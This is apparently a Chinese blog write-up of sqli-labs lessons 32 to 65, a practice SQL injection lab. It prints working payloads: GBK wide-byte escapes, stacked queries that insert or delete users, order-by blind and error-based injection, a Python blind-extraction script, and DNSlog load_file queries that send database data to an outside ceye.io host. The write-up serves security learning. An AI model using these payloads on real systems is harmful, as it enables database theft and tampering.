</code></pre><h2 id="Less-32"><a href="#Less-32" class="headerlink" title="Less-32"></a>Less-32</h2><p>这里使用了addslashes()函数对特殊字符进行转义，但是看一下源码，可以发现整个文件被设置成了GBK编码格式。</p>
<pre><code>mysql_query(&quot;SET NAMES gbk&quot;);
</code></pre><p>所以这里的addslashes()函数可以用GBK编码的方式来进行宽字节注入。</p>
<p>payload：<code>id=-1%df%27union%20select%201,2,version()--+</code></p>
<p>在经过addslashes()函数时，会把’转义成\’，但是到mysql解释器时，会认为%df/是一个汉字，从而让’逃逸，这个时候’就可以用来闭合前面的’了，再把后面的单引号注释掉，就可以进行注入了。</p>
<p><img src="http://static.zybuluo.com/Em1or/989x0vn3d1of9dirwvl75fba/QQ%E6%88%AA%E5%9B%BE20181112073602.png" alt="QQ截图20181112073602.png-636.4kB"></p>
<h2 id="Less-33"><a href="#Less-33" class="headerlink" title="Less-33"></a>Less-33</h2><p>payload：id=-1%df%27union%20select%201,2,version()–+</p>
<p>没看出来和less-32有什么区别。</p>
<p><img src="http://static.zybuluo.com/Em1or/3mrtkb5oorkfff9eaufyqrsn/QQ%E6%88%AA%E5%9B%BE20181112073602.png" alt="QQ截图20181112073602.png-674.8kB"></p>
<h2 id="Less-34"><a href="#Less-34" class="headerlink" title="Less-34"></a>Less-34</h2><p>之前是从get处bypass addslashes()这个函数，这次要求从POST处bypass，get请求时会自动对url进行编码，那么我们现在对post的请求进行编码即可绕过。</p>
<p><img src="http://static.zybuluo.com/Em1or/f6fnbofhi0rv6w5c4jlvc2n3/QQ%E6%88%AA%E5%9B%BE20181112073602.png" alt="QQ截图20181112073602.png-370.3kB"></p>
<p>测试or 1=1成功登录，表示已经完成闭合，or 1=1处就是要插入的exp处。</p>
<p><img src="http://static.zybuluo.com/Em1or/cs9dczs1ou7lkofs3ux6hy8l/QQ%E6%88%AA%E5%9B%BE20181112073602.png" alt="QQ截图20181112073602.png-247.7kB"></p>
<p>接下来就是正常的注入步骤了。</p>
<h2 id="Less-35"><a href="#Less-35" class="headerlink" title="Less-35"></a>Less-35</h2><p>这道题是字符型注入，没有单引号，但是也用了addslashes()函数，我想了一下只有在爆表之后会用到单引号，接下来演示一下爆表bypass的payload。</p>
<p>先是普通的爆版本：<code>id=-1 union select 1,2,version()--+</code></p>
<p><img src="http://static.zybuluo.com/Em1or/xv5pf0fjr9ko4re3zai9qdes/QQ%E6%88%AA%E5%9B%BE20181112073602.png" alt="QQ截图20181112073602.png-606.1kB"></p>
<pre><code>id=-1 union select 1,2,table_name from information_schema.TABLES where table_schema=0x7365637572697479 limit 1,1--+
</code></pre><p>之前还一直不理解为什么说table_schema=’数据库’这样不常被人使用，原来就是怕遇到这种单引号被转义的情况。</p>
<p>这里我们可以直接使用十六进制来代替数据库名，无需单引号，所以可以直接查询。</p>
<p>这里要解释一下，mysql会自动把十六进制转换成字符串，下面来看演示：</p>
<p><img src="http://static.zybuluo.com/Em1or/qol1ggdbycw0obrc33q8vvwi/QQ%E6%88%AA%E5%9B%BE20181112073602.png" alt="QQ截图20181112073602.png-138.5kB"></p>
<p>这里可以造成二次注入漏洞，比如存了一个数字进去，存的时候要求必须为int型，那么如果我们存一个十六进制进去，存进去就会被转成原来的内容，当他再次取出来的时候就会造成注入漏洞，这个也在这次的极客大挑战中出现了。</p>
<p>原来之前看似麻烦的代码都是为了帮助我们绕过一些过滤啊…</p>
<p><img src="http://static.zybuluo.com/Em1or/2pc5wfnt7gkqy967wuxxdbmm/QQ%E6%88%AA%E5%9B%BE20181112073602.png" alt="QQ截图20181112073602.png-621.1kB"></p>
<p><img src="http://static.zybuluo.com/Em1or/zw50zd62tk2lqn4n4s273g8y/QQ%E6%88%AA%E5%9B%BE20181112073602.png" alt="QQ截图20181112073602.png-686.8kB"></p>
<h2 id="Less-36"><a href="#Less-36" class="headerlink" title="Less-36"></a>Less-36</h2><p>这题没看出来和之前的有什么不同。</p>
<p>payload：<code>id=-1%df%27union%20select%201,2,table_name%20from%20information_schema.tables%20where%20table_schema=0x7365637572697479--+</code></p>
<p><img src="http://static.zybuluo.com/Em1or/ej34qh11vaqpydqtut59vo5y/QQ%E6%88%AA%E5%9B%BE20181112073602.png" alt="QQ截图20181112073602.png-648.6kB"></p>
<h2 id="Less-37"><a href="#Less-37" class="headerlink" title="Less-37"></a>Less-37</h2><p>这道题和上题一样，只是采用了不同的数据传输方式，一个是GET一个是POST。</p>
<p><img src="http://static.zybuluo.com/Em1or/3cb4yw9etx5k5ncofsq7ldy1/%E5%9B%BE%E7%89%87.png" alt="图片.png-354kB"></p>
<p>可以看到是能登录成功的，也就是说我们已经完成了闭合并且成功执行了sql语句，那么我们构造一下爆库的payload。</p>
<p><img src="http://static.zybuluo.com/Em1or/58jbl0xx2gew1at6hbqjaw2m/%E5%9B%BE%E7%89%87.png" alt="图片.png-356.8kB"></p>
<p>接下来就和普通注入一样了…</p>
<p>PS：上一道题和这一道题是我理解错了，他们和之前的题虽然解法相同，但是所用的编码函数不同，比如一个为addslashes()，另外一个为mysql_real_escape_string（），两种过滤方式都可以在GBK编码时用宽字节进行注入。</p>
<h2 id="Less-38"><a href="#Less-38" class="headerlink" title="Less-38"></a>Less-38</h2><p>在做这章的题目之前我们需要了解一个知识点，那就是堆叠注入。</p>
<p>一条MYSQL命令语句以;结束，那么试想我们能不能在;之后再进行一条语句的执行呢。</p>
<p>比如：select * from users where id=$id;</p>
<p>这里的$id=1;delete from users where username=’admin’;。</p>
<p>先看看users表。</p>
<p><img src="http://static.zybuluo.com/Em1or/q4g47jlj2o2yqjtw1xndznl1/%E5%9B%BE%E7%89%87.png" alt="图片.png-90.2kB"></p>
<p>可以看到是执行成功的，那么我们看看users表。</p>
<p><img src="http://static.zybuluo.com/Em1or/k7wrpvadnt9ietksg8cox491/%E5%9B%BE%E7%89%87.png" alt="图片.png-84.7kB"></p>
<p>可以看到admin用户已经被删除了，也就是;后面的第二条语句成功执行了。</p>
<p>但是这种堆叠注入用的地方不是很广，1是因为mysql只会返回第一条注入语句的信息，2是因为有时候权限和各种限制导致堆叠注入不能进行。</p>
<p>而堆叠注入还需要提前知道数据库中的一些信息，比如数据库名、表名、列名等。</p>
<p>堆叠注入常常用于增删改操作，很少用于查询操作。</p>
<p>现在回到题目：</p>
<p>这是一道很常规的题，没有任何的过滤，我们来测试一下堆叠注入。</p>
<pre><code>id=1&apos;;insert into users (username,password) values (&apos;testtest&apos;,&apos;testtest&apos;)--+
</code></pre><p>查看一下users表中是否多了这两条数据。</p>
<p><img src="http://static.zybuluo.com/Em1or/dhneqeeefaz0yd3uzlima6ld/%E5%9B%BE%E7%89%87.png" alt="图片.png-85.1kB"></p>
<p>可以看到的确是多出来的，说明堆叠注入成功了。</p>
<h2 id="Less-39"><a href="#Less-39" class="headerlink" title="Less-39"></a>Less-39</h2><p>这道题和上一道题的区别就在于有无单引号。</p>
<p>payload：<code>id=1;insert into users (username,password) values (&#39;testtest&#39;,&#39;testtest&#39;)--+</code></p>
<p><img src="http://static.zybuluo.com/Em1or/og5tgdevzlt7ntsgtqtzjmdm/%E5%9B%BE%E7%89%87.png" alt="图片.png-85.6kB"></p>
<p>可以看到是堆叠注入成功的。</p>
<h2 id="Less-40"><a href="#Less-40" class="headerlink" title="Less-40"></a>Less-40</h2><p>这题也是想考堆叠注入，只不过注入语句发生了变化，无关紧要，sql注入最主要的是找到可以执行我们sql语句的地方，并绕过waf。</p>
<p>payload：id=-1’) union select 1,2,version() –+</p>
<p>exp：id=-1’)exp–+</p>
<p><img src="http://static.zybuluo.com/Em1or/l0fjljbc43enymgvvef4j0wg/%E5%9B%BE%E7%89%87.png" alt="图片.png-833.8kB"></p>
<h2 id="Less-41"><a href="#Less-41" class="headerlink" title="Less-41"></a>Less-41</h2><p>这题和上题是一样的，只不过sql语句不同。</p>
<p>payload：id=-1 union select 1,2,version()–+</p>
<p><img src="http://static.zybuluo.com/Em1or/t7qm2cvvamw4e2m17iy0hf3c/%E5%9B%BE%E7%89%87.png" alt="图片.png-760.9kB"></p>
<h2 id="Less-42"><a href="#Less-42" class="headerlink" title="Less-42"></a>Less-42</h2><p>打开之后是一个登陆界面，注册功能和找回功能都不可用。</p>
<p><img src="http://static.zybuluo.com/Em1or/ychwsr22r16eiir3wggsk6k1/%E5%9B%BE%E7%89%87.png" alt="图片.png-819.9kB"></p>
<p>翻源码可知，对username进行了过滤，但是password没任何过滤就传进去了。</p>
<p><img src="http://static.zybuluo.com/Em1or/a42luw1kg8kemhwtwofuo2mv/%E5%9B%BE%E7%89%87.png" alt="图片.png-72.5kB"></p>
<p>我们可以在password处来注入。</p>
<p>但是这里不能使用布尔盲注或者报错注入，只能使用延时，因为无任何数据回显。</p>
<p>但是用本地mysql监控的语句是可以成功执行的。</p>
<p><img src="http://static.zybuluo.com/Em1or/nrmo06c8y2e9ws0qa2yszvr7/%E5%9B%BE%E7%89%87.png" alt="图片.png-79.5kB"></p>
<p><img src="http://static.zybuluo.com/Em1or/i56jde69wbxmbgo75rpepxe7/%E5%9B%BE%E7%89%87.png" alt="图片.png-87.5kB"></p>
<p>后面测试了一下，发现这里无法用延时，这里说一下刚刚观察发现的。</p>
<pre><code>select * from users where username=&apos;admin1&apos; and id=&apos;&apos; and if(1=1,sleep(5),NULL)
</code></pre><p>这里必须username和id都存在并且正确，才会执行下一个and，否则是不会执行的，因为这里的sql语句是：</p>
<pre><code>select username,password from users where username=$username and password=$password 
</code></pre><p>如果我们想执行延时，那这里的$username和$password必须都符合。所以在正常的业务逻辑下是不阔能的，除非这里是一个用户系统，所以这里只能使用堆叠注入。</p>
<p><img src="http://static.zybuluo.com/Em1or/ykng1ik8e7le9pgpsk30g4fe/%E5%9B%BE%E7%89%87.png" alt="图片.png-83.9kB"></p>
<p>payload：<code>login_password=asd&#39;;insert into users (username,password) values (&#39;admin456&#39;,&#39;admin567&#39;);&#39;#</code></p>
<p>查看是否成功插入数据：</p>
<p><img src="http://static.zybuluo.com/Em1or/13d575encdm94xi6yrslt59g/%E5%9B%BE%E7%89%87.png" alt="图片.png-87kB"></p>
<p>可以看到是成功插入的。</p>
<h2 id="Less-43"><a href="#Less-43" class="headerlink" title="Less-43"></a>Less-43</h2><p>进去之后看到一个登录框，猜测注入语句为：</p>
<pre><code>select username,password from table where username=(&apos;$username&apos;) and password=(&apos;$password&apos;)
</code></pre><p>如果是这样的话，我们就可以开始构造堆叠注入的payload了。</p>
<p>$username=’);insert into users (username,password) values (‘stack’,’stcak’)#</p>
<p>测试之后发现过滤了单引号，那么我们试试之前的宽字节？</p>
<p>payload：<code>login_user=%df&#39;);insert into users (username,password) values (&#39;stack&#39;,&#39;stcak&#39;)#</code></p>
<p>让我们来看看他执行了什么：</p>
<pre><code>SELECT * FROM users WHERE username=(&apos;\xDF\&apos;);insert into users (username,password) values (\&apos;stack\&apos;,\&apos;stcak\&apos;)##&apos;) and password=(&apos;admin&apos;)
</code></pre><p>可以看到这里我们是成功的闭合了前面的insert语句的，但是后面的values的单引号又被转义了，没关系，这里我们可以转成十六进制来存储。</p>
<p>最终执行语句为：</p>
<pre><code>SELECT * FROM users WHERE username=(&apos;\xDF\&apos;);insert into users (username,password) values (0x737461636b,0x737461636b)#&apos;) and password=(&apos;admin&apos;)
</code></pre><p>发现还是不成功，因为这里后面有个单引号。</p>
<p>后来看了一下代码：</p>
<pre><code>$username = mysqli_real_escape_string($con1, $_POST[&quot;login_user&quot;]);
$password = $_POST[&quot;login_password&quot;];
</code></pre><p>这里只对username进行转义，没有对password进行转义，所以导致我们可以在password处进行堆叠注入。</p>
<p><img src="http://static.zybuluo.com/Em1or/mdwno0khsgq3hqpzccn434ir/image_1cs5fifjaoigtf91gcn1ntv1me29.png" alt="image_1cs5fifjaoigtf91gcn1ntv1me29.png-172.1kB"></p>
<p>可以看到是成功插入的。</p>
<p>其实前面的username的过滤在一定情况下是可以绕的，在源码中发现设置的编码是utf-8不是gbk…所以导致这里的单引号无法逃逸。</p>
<h2 id="Less-44"><a href="#Less-44" class="headerlink" title="Less-44"></a>Less-44</h2><p>看一下代码吧：</p>
<pre><code>$username = mysqli_real_escape_string($con1, $_POST[&quot;login_user&quot;]);
</code></pre><p>   $password = $_POST[“login_password”];</p>
<p>和之前的一样，只对username进行了转义处理，password没有任何处理直接代入查询语句。</p>
<pre><code>$sql = &quot;SELECT * FROM users WHERE username=&apos;$username&apos; and password=&apos;$password&apos;&quot;;
</code></pre><p>我们根据查询语句写个payload。</p>
<p>payload：login_password=admin’;insert into users (username,password) values (‘stack1’,’stack2’)#</p>
<p><img src="http://static.zybuluo.com/Em1or/eaff1p4dogym6pazbcrqpmye/image_1cs5frraagqb18j7ipjrknag013.png" alt="image_1cs5frraagqb18j7ipjrknag013.png-123.4kB"></p>
<p><img src="http://static.zybuluo.com/Em1or/x6qsqyi66abfpzcsom2f0u6c/image_1cs5frlo815sqjpqloe161ttknm.png" alt="image_1cs5frlo815sqjpqloe161ttknm.png-173.4kB"></p>
<p>可以看到是成功添加了的。</p>
<h2 id="Less-45"><a href="#Less-45" class="headerlink" title="Less-45"></a>Less-45</h2><pre><code>$sql = &quot;SELECT * FROM users WHERE username=(&apos;$username&apos;) and password=(&apos;$password&apos;)&quot;;
</code></pre><p>sql执行语句和43关一毛一样，也是只对username进行转义不对password进行转义，所以payload也是一毛一样。。照着43关做就行了。</p>
<h2 id="Less-46"><a href="#Less-46" class="headerlink" title="Less-46"></a>Less-46</h2><p>在写Less-46之前，我们来介绍一下order by这种注入类型。</p>
<p>有的时候sql语句是这样的：<code>select * from table order by $id;</code></p>
<p>我们怎么判断是否为这种注入类型呢？我们把id输为1 desc和1 asc看看结果是否不同就行了。</p>
<p>因为desc在order by中是升序排列的意思，asc在order by中是降序排列的意思。</p>
<p>这里的1表示的是列名的序列号，如果我们知道列名，也可以直接把id替换为列名。</p>
<p>那么我们该如何构造注入语句呢？我们可以利用他升序和降序的特性来进行布尔盲注，以Less-46为例。</p>
<p>PS：默认是升序排列</p>
<p>可以看到输入1 desc之后原本的升序排列变成了降序排列，表示这里存在order by注入。</p>
<p><img src="http://static.zybuluo.com/Em1or/moewe0lxqw58l1u16drz4c9m/QQ%E6%88%AA%E5%9B%BE20181113112938.png" alt="QQ截图20181113112938.png-436.9kB"></p>
<p>我们来试着构造payload：</p>
<pre><code>$id=if(left((select version()),1)=&apos;5&apos;,1,(select+1+union+select+2))
</code></pre><p>这段的意思就是如果select version()这个命令取出来的左边第一个值为5，就返回1，否则返回后面那条。</p>
<p>而后面那条在order by中会报错，所以我们只需要用正确和错误两个页面的不同就可以来构造布尔盲注。</p>
<p>这是第一种方法，接下来我们来试试使用updatexml函数。</p>
<p><img src="http://static.zybuluo.com/Em1or/sey2ia482o3sufs3hfnx0dih/image_1cs5io208an9dsu9dh1re8b5s13.png" alt="image_1cs5io208an9dsu9dh1re8b5s13.png-160.8kB"></p>
<p>可以发现order by是会报错并且回显的。</p>
<p>试试报库：<code>updatexml(1,concat(0x7e,(select SCHEMA_NAME from information_schema.schemata limit 1,1),0x7e),1)</code></p>
<p><img src="http://static.zybuluo.com/Em1or/9l5colaqsk6ycih7l3zksbrk/image_1cs5itrtg136q11vvk2i556mbc20.png" alt="image_1cs5itrtg136q11vvk2i556mbc20.png-397.5kB"></p>
<p>同样的我们还可以利用extractvalue这个报错函数来进行注入。不多演示，只是演示一下在order by中我们该如何进行注入。</p>
<p>之前一直没有具体了解过updatexml和extractvalue这两个函数。</p>
<p>updatexml之前已经解释过了，下面来解释一下extractvalue()这个函数。</p>
<p>语法：extractvalue(目标xml文档,xml路径)</p>
<blockquote>
<p>第二个参数 xml中的位置是可操作的地方，xml文档中查找字符位置是用<br>/xxx/xxx/xxx/…这种格式，如果我们写入其他格式，就会报错，并且会返回我们写入的非法格式内容，而这个非法的内容就是我们想要查询的内容。</p>
</blockquote>
<p>所以我们只需要写入其它格式就好，以~开头的内容不是xml格式的语法，我们可以使用concat函数连接字符串，这样他就会返回报错的内容。</p>
<p><img src="http://static.zybuluo.com/Em1or/s91ex0wo7hbfhcxbjdzyx9we/image_1cs5k3maimtc1of81oal158pqpa2t.png" alt="image_1cs5k3maimtc1of81oal158pqpa2t.png-180.9kB"></p>
<pre><code>select extractvalue(&apos;ddd&apos;,concat(&apos;~&apos;,version()))
</code></pre><p>可以看到是直接返回了我的版本信息，因为我们concat连接后的字符串为~5.5.53，因为~开头的内容不是xml格式，所以就会报错，这个函数会将报错的内容输出给我们，这个时候就导致了报错注入。</p>
<p>好了，extractvalue函数也讲完了，下面让我们讲讲在order by之后还可以使用什么方法进行注入。</p>
<p>有时候我们碰到的不仅仅是order by，可能order by之后还跟了个limit。</p>
<p>select * from users order by 1 limit $id。</p>
<p>这个时候我们的注入位置在$id处，我们可以使用procedure analyse来进行报错注入或者延时注入。</p>
<p>报错注入payload：</p>
<pre><code>limit 1,1  procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
</code></pre><p>延时注入payload：<code>LIMIT 1,1 PROCEDURE analyse((extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)</code></p>
<p>Freebuf上的payload不知道为什么用不了，我改了一下就可以用了。</p>
<p>我们平时也不会傻到用延时不用报错，所以延时注入是在站点无报错的时候使用的。</p>
<p>这里的不能使用sleep，只能使用benchmark这个函数。</p>
<p>有关语法可以自己百度查一下。</p>
<p>这是他的判断语句：<code>IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1)</code></p>
<p>MID用来取返回值的数第几位字符，需要用到时再百度。</p>
<p>这里举一个简单的利用MID来进行延时注入的例子。</p>
<pre><code>select if(mid((select schema_name from information_schema.schemata limit 0,1),1,1)=&apos;i&apos;,sleep(2),1)
</code></pre><h2 id="Less-48"><a href="#Less-48" class="headerlink" title="Less-48"></a>Less-48</h2><p>测试了一下之后发现这里的语句是这样的：</p>
<p>select * from table order by $sort;</p>
<p>但是这里有一个点是需要注意的，不管你报错不报错，只要你出错了，他就不返回内容。所以我们这个时候要写一个盲注脚本，利用正确和错误两个页面不同来判断是否操作正确。</p>
<p><img src="http://static.zybuluo.com/Em1or/iyu9897036q4ruav091xsmer/image_1cs5mv3n86v2b409lc1ch51unm3q.png" alt="image_1cs5mv3n86v2b409lc1ch51unm3q.png-165.5kB"></p>
<p>脚本：</p>
<pre><code>import requests
import string
import time

characters = string.ascii_letters + string.digits + string.punctuation
data = &apos;&apos;


for number in range(1,20):
        for character in characters:
            url =&quot;http://sqllab/Less-48/?sort=if(mid((select%20schema_name%20from%20information_schema.schemata%20limit%200,1),&quot;+str(number)+&quot;,1)=%27&quot;+character+&quot;%27,1,(select+1+from+information_schema.tables))--+&quot;
            html = requests.get(url).text
            if &quot;Dumb&quot; in html:
                data=data+character
                print(&quot;[+]&quot;+data)
                break
</code></pre><p>我用Python写个盲注和延时一样的速度…我在想赶紧学个二分法或者啥的加快一下盲注速度，不然人家sqlmap嗖一下就出来了，你还得等几分钟…</p>
<p>如果PHP能有类似的脚本，应该会快很多，之前substr六位用python跑了十分钟，php跑了三秒，我也是醉了…</p>
<h2 id="Less-49"><a href="#Less-49" class="headerlink" title="Less-49"></a>Less-49</h2><p>这道题和之前的一样，也是错误了没有报错信息，所以只能写盲注脚本跑，只不过和上一道题不同的是sql语句。</p>
<pre><code>select * from table order by &apos;$sort&apos;
</code></pre><p>所以我们需要闭合前后两个单引号，然后使用if来进行盲注。</p>
<pre><code>http://sqllab/Less-49/?sort=1%27%20and%20if(1=1,1,(select+1+from+information_schema.tables))--+
</code></pre><p>当if的第一个条件成立时，返回有内容的页面，否则返回无内容的页面，改一下上面的盲注脚本就可以跑了。</p>
<p><img src="http://static.zybuluo.com/Em1or/8o9gndrs7s7bjjizc7gf0m5d/QQ%E6%88%AA%E5%9B%BE20181113112938.png" alt="QQ截图20181113112938.png-117.4kB"></p>
<h2 id="Less-50"><a href="#Less-50" class="headerlink" title="Less-50"></a>Less-50</h2><p>这里的sql语句是：</p>
<p>select * from table order by $sort;</p>
<p>没有单引号保护也没有双引号保护，而且返回报错信息，一开始做就觉得这道题估计考点不是想让我们注入，后来看了一下前辈写的wp才知道原来这里是让我们试着使用堆叠注入。</p>
<p>这里的执行mysql语句的函数变了：由mysqli _query()转为mysqli_multi_query()。</p>
<p>区别在于mysqli_multi_query()可以同时执行多个语句，所以即使这里处于order by处我们也可以进行堆叠注入。</p>
<p>和之前一样：?sort=;insert into users (username,password) values (‘ttt’,’ttt’)</p>
<p><img src="http://static.zybuluo.com/Em1or/0xvytho9h6la70k2ifh2wvu2/QQ%E6%88%AA%E5%9B%BE20181113112938.png" alt="QQ截图20181113112938.png-129.9kB"></p>
<p>可以看到的确是增加成功的。</p>
<p>然后回去看了之后才知道原来之前的执行也都是mysqli_multi_query()，否则是无法执行堆叠的，难怪了，晚上还在想如果这样可以增加用户那岂不是很多站点都要遭殃，原来如此…</p>
<h2 id="Less-51"><a href="#Less-51" class="headerlink" title="Less-51"></a>Less-51</h2><p>这里的考点也是堆叠注入，只不过注入语句比上面多了一个单引号保护，我们闭合就好。</p>
<p>payload：<code>1&#39;;insert into users (username,password) values (&#39;ttt1&#39;,&#39;ttt2&#39;) --+</code></p>
<p><img src="http://static.zybuluo.com/Em1or/fiztit43geludyn87152korg/QQ%E6%88%AA%E5%9B%BE20181113112938.png" alt="QQ截图20181113112938.png-129.6kB"></p>
<h2 id="Less-52"><a href="#Less-52" class="headerlink" title="Less-52"></a>Less-52</h2><p>还是考的堆叠注入，只不过变成盲注了，不影响sql语句执行。</p>
<p><img src="http://static.zybuluo.com/Em1or/qpkmdlbncyu45y95i2cl8dl8/QQ%E6%88%AA%E5%9B%BE20181113112938.png" alt="QQ截图20181113112938.png-436.2kB"></p>
<p><img src="http://static.zybuluo.com/Em1or/0l4g9zsw4wql1yhnstrjygjg/QQ%E6%88%AA%E5%9B%BE20181113112938.png" alt="QQ截图20181113112938.png-129.3kB"></p>
<h2 id="Less-53"><a href="#Less-53" class="headerlink" title="Less-53"></a>Less-53</h2><p>又是考的堆叠，好无聊…payload和上关一样。</p>
<pre><code>sort=1&apos;;insert into users (username) values (&apos;ddddddddsss&apos;)--+
</code></pre><p><img src="http://static.zybuluo.com/Em1or/om04ea1jra1e005en93t691w/QQ%E6%88%AA%E5%9B%BE20181113112938.png" alt="QQ截图20181113112938.png-129.3kB"></p>
<h2 id="Less-54-Less-62"><a href="#Less-54-Less-62" class="headerlink" title="Less-54-Less-62"></a>Less-54-Less-62</h2><p>这里考的都是基础考点，比如联合查询，报错注入等，只不过限制了我们查询的次数，次数超过就会刷新表和列的信息。</p>
<h2 id="Less-62-Less-65"><a href="#Less-62-Less-65" class="headerlink" title="Less-62-Less-65"></a>Less-62-Less-65</h2><p>这部分考的是盲注，还是限制了查询次数，这我就不知道怎么搞了，因为盲注我只会一个个猜解，所以以我现在的方法一百三十次的查询次数顶多够我查一个表名出来…学到更棒的方法再继续了解吧。</p>
<p>上面的盲注我知道咋搞了，可以直接用dnslog来解决，先示范一下。</p>
<pre><code>http://sqllab/Less-65/?id=1%22)union%20select%201,2,load_file(concat(%27\\\\%27,(select%20version()),%27.mysql.xd1t8w.ceye.io\\efg%27))--+
</code></pre><p><img src="http://static.zybuluo.com/Em1or/9n9jrze9slgo2f99quqkxk5z/QQ%E5%9B%BE%E7%89%8720181114080252.png" alt="QQ图片20181114080252.png-621.4kB"></p>
<p>中间还闹了个乌龙，因为代码写错了，错的地方又是不容易发现的括号，找了半天没找到哪里错，还特地用代码对比来比对正确和错误的区别…</p>
<p>下面我们来看dnslog的结果：</p>
<p><img src="http://static.zybuluo.com/Em1or/m8wpnfpudm6bxd0lqf4gm7rv/image_1csb01acc1mhnh3845p1m2g1lno15.png" alt="image_1csb01acc1mhnh3845p1m2g1lno15.png-58.4kB"></p>
<p>可以看已经有mysql的版本了，下面我们继续来爆表。</p>
<pre><code>http://sqllab/Less-65/?id=1%22)union%20select%201,2,load_file(concat(%27\\\\%27,(select%20hex(group_concat(table_name))%20from%20information_schema.tables%20where%20table_schema=%27security%27),%27.mysql.xd1t8w.ceye.io\\efg%27))--+
</code></pre><p><img src="http://static.zybuluo.com/Em1or/t0hwcprblw64p7t24qmzggls/image_1csb084hhem5ogcuaj1rl2fba22.png" alt="image_1csb084hhem5ogcuaj1rl2fba22.png-76.1kB"></p>
<p>我们拿返回的数据去hex解码一下，就可以看到我们的表名了。</p>
<p><img src="http://static.zybuluo.com/Em1or/2bi8wgd0tus9sdozyfssy8rk/image_1csb091p314931v3e1ucue417n42f.png" alt="image_1csb091p314931v3e1ucue417n42f.png-18.9kB"></p>

  </div>
  <div class="post-footer">
    

    <a href="#top" class="top">Back to Top</a>
  </div>
</article>
<footer>
  &copy; 2018
  <span class="author">
    P1g3
  </span>
</footer>
    </div>
  </body>
</html>